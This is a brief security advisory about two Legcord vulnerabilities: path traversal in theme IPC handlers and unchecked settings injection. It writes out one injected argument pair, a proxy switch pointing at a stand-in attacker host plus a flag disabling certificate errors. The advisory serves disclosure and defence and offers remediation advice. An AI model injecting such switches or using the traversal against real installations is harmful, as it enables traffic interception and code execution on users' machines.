If you use Legcord as your Discord client, a script running in the Discord page can break out of the Electron sandbox entirely.
CVE-2026-105293 (CVSS 8.1) — Path Traversal to RCE
Theme IPC handlers (themes.install, themes.uninstall, themes.folder) accept identifiers without sanitizing ../ sequences. Discord-origin script passes a traversal payload → writes arbitrary files, deletes directories, or launches local executables outside the themes directory.
CVE-2026-105294 (CVSS 7.4) — Config Injection → Persistent MITM
window.legcord.settings.setConfig has no allowlist. Script sets additionalArguments to --proxy-server=attacker-host --ignore-certificate-errors. Persists to disk. Every subsequent Legcord launch routes all traffic through the attacker's proxy with TLS validation silently disabled.
Both require Discord-origin XSS first — not drive-by, but chain-dependent exploitation is realistic.
No confirmed fixed version as of publication. Upgrade past 1.3.0 and check your config for injected proxy switches.
Top comments (0)